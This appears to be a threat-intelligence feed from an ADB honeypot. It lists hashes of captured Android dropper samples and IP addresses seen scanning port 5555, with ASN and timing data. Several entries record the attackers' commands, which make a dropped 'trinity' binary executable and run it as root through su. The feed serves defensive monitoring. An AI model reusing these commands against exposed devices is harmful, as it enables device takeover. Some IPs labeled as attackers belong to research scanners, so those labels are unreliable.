SHA-256	a6d8c472a507c244e06a73fe1e8003615cb034f1cee6cc74cac7438ef3403ec8	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/a6d8c472a507c244e06a73fe1e8003615cb034f1cee6cc74cac7438ef3403ec8.raw; last_seen=2026-04-05T20:23:12.289Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-04-05
SHA-256	f03b3ba2573065ffba9e459b0f76015b88310fbd2a3414fffeb2edffbbe599dd	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/f03b3ba2573065ffba9e459b0f76015b88310fbd2a3414fffeb2edffbbe599dd.raw; last_seen=2026-04-04T06:08:43.690Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-04-04
SHA-256	1aa275960ac18c41929a3d5cb9ef318df53b5f2234e54addbdfe9b4a90322c6f	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/1aa275960ac18c41929a3d5cb9ef318df53b5f2234e54addbdfe9b4a90322c6f.raw; last_seen=2026-04-04T06:08:40.351Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-04-04
SHA-256	c44d7219bd0e05ba273786530cf5c1a9e2977fdeead6b6662aa2bd8d5bb55d8f	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/c44d7219bd0e05ba273786530cf5c1a9e2977fdeead6b6662aa2bd8d5bb55d8f.raw; last_seen=2026-04-04T06:08:41.413Z	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-04-04
SHA-256	63946c28efa919809c03be75a3937c4be80589a9df79cd1be72037d493b70857	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/63946c28efa919809c03be75a3937c4be80589a9df79cd1be72037d493b70857.raw; src_ip=203.229.224.194; src_ips=203.229.224.194; cc=KR; last_seen=2026-04-03T10:25:43.679Z; cmds=[/data/local/tmp/nohup /data/local/tmp/trinity \| /data/local/tmp/nohup su -c /data/local/tmp/trinity \| chmod 0755 /data/local/tmp/trinity]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-04-03
SHA-256	0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257.raw; src_ip=218.205.95.163; src_ips=218.205.95.163; cc=CN; last_seen=2026-04-03T04:24:39.024Z; cmds=[/data/local/tmp/nohup /data/local/tmp/trinity \| /data/local/tmp/nohup su -c /data/local/tmp/trinity \| chmod 0755 /data/local/tmp/trinity]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-04-03
SHA-256	76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64.raw; src_ip=218.205.95.163; src_ips=218.205.95.163; cc=CN; last_seen=2026-04-03T04:24:59.005Z; cmds=[/data/local/tmp/nohup /data/local/tmp/trinity \| /data/local/tmp/nohup su -c /data/local/tmp/trinity \| chmod 0755 /data/local/tmp/trinity]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-04-03
SHA-256	a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437.raw; src_ip=218.205.95.163; src_ips=218.205.95.163; cc=CN; last_seen=2026-04-03T04:25:16.360Z; cmds=[/data/local/tmp/nohup /data/local/tmp/trinity \| /data/local/tmp/nohup su -c /data/local/tmp/trinity \| chmod 0755 /data/local/tmp/trinity]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-04-03
SHA-256	d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0.raw; src_ip=218.205.95.163; src_ips=218.205.95.163; cc=CN; last_seen=2026-04-03T04:25:25.629Z; cmds=[/data/local/tmp/nohup /data/local/tmp/trinity \| /data/local/tmp/nohup su -c /data/local/tmp/trinity \| chmod 0755 /data/local/tmp/trinity]	nadsec, tpot, adbhoney, dropper, sample, sha256	2026-04-03
IPv4	130.12.180.65	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=NL; asn=202412; asn_org=Omegatech LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=1740 \| first_seen=2026-04-01T01:17:43.000Z \| last_seen=2026-04-30T22:37:41.763Z \| ports=5555 \| cc=NL \| asn=202412 \| org=Omegatech LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	205.210.31.83	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=45 \| first_seen=2026-04-01T01:28:21.000Z \| last_seen=2026-04-20T05:37:30.190Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	104.28.166.112	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=SG; asn=13335; asn_org=Cloudflare, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-01T02:03:07.000Z \| last_seen=2026-04-01T02:13:18.893Z \| ports=5555 \| cc=SG \| asn=13335 \| org=Cloudflare, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	91.231.89.206	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=25 \| first_seen=2026-04-01T02:05:59.000Z \| last_seen=2026-04-29T01:56:54.867Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	91.231.89.211	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-01T02:13:44.000Z \| last_seen=2026-04-22T18:48:34.377Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	91.231.89.212	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-01T02:13:44.000Z \| last_seen=2026-04-01T02:24:04.766Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	193.32.162.28	Attacker IP • ADB / seen in ADBHoney; events=48; ports=5555; cc=RO; asn=47890; asn_org=Unmanaged Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=347 \| first_seen=2026-04-01T03:55:20.000Z \| last_seen=2026-04-25T14:24:27.460Z \| ports=5555 \| cc=RO \| asn=47890 \| org=Unmanaged Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	45.135.194.48	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=DE; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=46 \| first_seen=2026-04-01T03:09:34.000Z \| last_seen=2026-04-01T23:27:24.972Z \| ports=5555 \| cc=DE \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	64.62.197.32	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-01T03:50:29.000Z \| last_seen=2026-04-01T04:00:35.521Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	64.62.197.44	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-01T03:49:55.000Z \| last_seen=2026-04-01T03:51:01.217Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	85.90.246.159	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=DE; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-01T03:35:47.000Z \| last_seen=2026-04-01T05:30:42.016Z \| ports=5555 \| cc=DE \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	91.148.190.150	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=BG; asn=50360; asn_org=Tamatiya EOOD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=10 \| first_seen=2026-04-01T03:01:07.000Z \| last_seen=2026-04-09T00:26:26.779Z \| ports=5555 \| cc=BG \| asn=50360 \| org=Tamatiya EOOD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	221.138.202.107	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=KR; asn=9318; asn_org=SK Broadband Co Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-01T06:22:55.000Z \| last_seen=2026-04-01T06:33:55.135Z \| ports=5555 \| cc=KR \| asn=9318 \| org=SK Broadband Co Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	144.31.186.157	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=DE; asn=215590; asn_org=DpkgSoft International Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-01T11:17:32.000Z \| last_seen=2026-04-01T11:27:39.962Z \| ports=5555 \| cc=DE \| asn=215590 \| org=DpkgSoft International Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	64.23.193.149	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-01T11:57:43.000Z \| last_seen=2026-04-01T12:08:01.729Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	117.68.74.162	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=25 \| first_seen=2026-04-01T12:26:32.000Z \| last_seen=2026-04-25T11:14:08.938Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	117.68.74.165	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-01T12:26:33.000Z \| last_seen=2026-04-12T05:00:42.360Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	185.141.119.75	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=93 \| first_seen=2026-04-01T12:13:17.000Z \| last_seen=2026-04-06T11:22:13.793Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	172.239.62.109	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-01T15:47:26.000Z \| last_seen=2026-04-01T15:48:27.656Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	185.93.89.190	Attacker IP • ADB / seen in ADBHoney; events=1; ports=5555; cc=IR; asn=213790; asn_org=Limited Network LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=63 \| first_seen=2026-04-01T14:59:24.000Z \| last_seen=2026-04-22T08:22:18.804Z \| ports=5555 \| cc=IR \| asn=213790 \| org=Limited Network LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	185.93.89.193	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=IR; asn=213790; asn_org=Limited Network LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=52 \| first_seen=2026-04-01T16:09:31.000Z \| last_seen=2026-04-22T08:22:21.717Z \| ports=5555 \| cc=IR \| asn=213790 \| org=Limited Network LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	85.217.149.59	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CA; asn=209334; asn_org=Modat B.V.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-01T17:18:57.000Z \| last_seen=2026-04-01T17:29:06.316Z \| ports=5555 \| cc=CA \| asn=209334 \| org=Modat B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	147.185.133.31	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-01T22:58:37.000Z \| last_seen=2026-04-01T23:09:39.350Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	185.246.128.25	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=SE; asn=42237; asn_org=w1n ltd; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=61 \| first_seen=2026-04-01T22:01:47.000Z \| last_seen=2026-04-29T21:32:47.211Z \| ports=5555 \| cc=SE \| asn=42237 \| org=w1n ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-01
IPv4	198.235.24.236	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=22 \| first_seen=2026-04-02T01:56:13.000Z \| last_seen=2026-04-02T02:07:54.344Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	64.62.156.52	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-02T01:27:23.000Z \| last_seen=2026-04-02T01:37:35.893Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	64.62.156.59	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-02T01:26:28.000Z \| last_seen=2026-04-02T01:27:35.722Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	167.71.181.247	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-02T02:17:24.000Z \| last_seen=2026-04-02T02:28:13.540Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	45.87.249.40	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=SC; asn=210006; asn_org=Shereverov Marat Ahmedovich; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-02T02:42:58.000Z \| last_seen=2026-04-02T03:07:06.559Z \| ports=5555 \| cc=SC \| asn=210006 \| org=Shereverov Marat Ahmedovich	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	88.210.63.190	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-02T03:36:16.000Z \| last_seen=2026-04-02T03:37:20.099Z \| ports=5555 \| cc=UA \| asn=211736 \| org=FOP Dmytro Nedilskyi	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	143.198.171.196	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-02T04:15:38.000Z \| last_seen=2026-04-02T04:17:17.819Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	45.146.55.39	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=US; asn=62240; asn_org=Clouvider Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-02T05:00:48.000Z \| last_seen=2026-04-02T05:14:18.799Z \| ports=5555 \| cc=US \| asn=62240 \| org=Clouvider Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	178.62.87.241	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=GB; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=13 \| first_seen=2026-04-02T07:44:18.000Z \| last_seen=2026-04-02T07:54:34.623Z \| ports=5555 \| cc=GB \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	216.121.219.61	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=CA; asn=7992; asn_org=Cogeco Connexion Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-02T07:36:53.000Z \| last_seen=2026-04-02T07:54:50.475Z \| ports=5555 \| cc=CA \| asn=7992 \| org=Cogeco Connexion Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	218.205.95.160	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=56041; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=65 \| first_seen=2026-04-02T10:55:42.000Z \| last_seen=2026-04-03T07:14:40.096Z \| ports=5555 \| cc=CN \| asn=56041 \| org=China Mobile communications corporation \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-02
IPv4	99.71.211.188	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=US; asn=7018; asn_org=AT&T Enterprises, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-02T10:13:32.000Z \| last_seen=2026-04-02T10:26:38.606Z \| ports=5555 \| cc=US \| asn=7018 \| org=AT&T Enterprises, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	211.248.175.131	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-02T12:42:39.000Z \| last_seen=2026-04-02T12:58:50.789Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	121.127.34.155	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=400587; asn_org=Ryamer, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-02T13:44:11.000Z \| last_seen=2026-04-02T13:45:12.630Z \| ports=5555 \| cc=US \| asn=400587 \| org=Ryamer, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	76.21.164.150	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=11 \| first_seen=2026-04-02T13:37:55.000Z \| last_seen=2026-04-02T13:39:06.431Z \| ports=5555 \| cc=US \| asn=7922 \| org=Comcast Cable Communications, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	142.93.147.187	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-02T14:27:43.000Z \| last_seen=2026-04-02T14:37:54.778Z \| ports=5555 \| cc=CA \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	64.62.156.38	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-02T14:55:57.000Z \| last_seen=2026-04-02T15:06:06.812Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	64.62.156.41	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-02T14:55:04.000Z \| last_seen=2026-04-02T14:56:11.577Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	172.234.21.101	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-02T15:47:06.000Z \| last_seen=2026-04-02T15:48:09.948Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	38.178.181.71	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=US; asn=35986; asn_org=Vyve Broadband; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-02T15:25:02.000Z \| last_seen=2026-04-02T15:42:26.575Z \| ports=5555 \| cc=US \| asn=35986 \| org=Vyve Broadband	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	45.56.84.110	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=10 \| first_seen=2026-04-02T15:47:26.000Z \| last_seen=2026-04-04T15:47:57.389Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	20.83.27.89	Attacker IP • ADB / seen in ADBHoney; events=20; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=25 \| first_seen=2026-04-02T16:56:10.000Z \| last_seen=2026-04-02T17:08:38.144Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	45.142.193.169	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=40 \| first_seen=2026-04-02T16:48:43.000Z \| last_seen=2026-04-30T07:17:18.665Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	204.76.203.215	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=20 \| first_seen=2026-04-02T20:36:46.000Z \| last_seen=2026-04-14T09:32:40.593Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	91.105.40.101	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=LV; asn=12578; asn_org=SIA Tet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-02T20:33:09.000Z \| last_seen=2026-04-02T20:44:46.022Z \| ports=5555 \| cc=LV \| asn=12578 \| org=SIA Tet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-02
IPv4	211.248.175.244	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-02T23:02:00.000Z \| last_seen=2026-04-02T23:20:19.056Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	66.132.186.202	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-03T00:39:20.000Z \| last_seen=2026-04-03T00:40:45.543Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	211.248.175.114	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-03T01:45:42.000Z \| last_seen=2026-04-03T02:00:53.375Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	5.187.35.142	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=NL; asn=206264; asn_org=Amarutu Technology Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=32 \| first_seen=2026-04-03T01:14:24.000Z \| last_seen=2026-04-13T13:04:18.969Z \| ports=5555 \| cc=NL \| asn=206264 \| org=Amarutu Technology Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	160.119.76.200	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=SC; asn=49870; asn_org=Alsycon B.V.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=12 \| first_seen=2026-04-03T02:39:00.000Z \| last_seen=2026-04-29T10:48:19.777Z \| ports=5555 \| cc=SC \| asn=49870 \| org=Alsycon B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
IPv4	147.185.132.60	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=24 \| first_seen=2026-04-03T04:39:54.000Z \| last_seen=2026-04-03T04:51:23.536Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-03
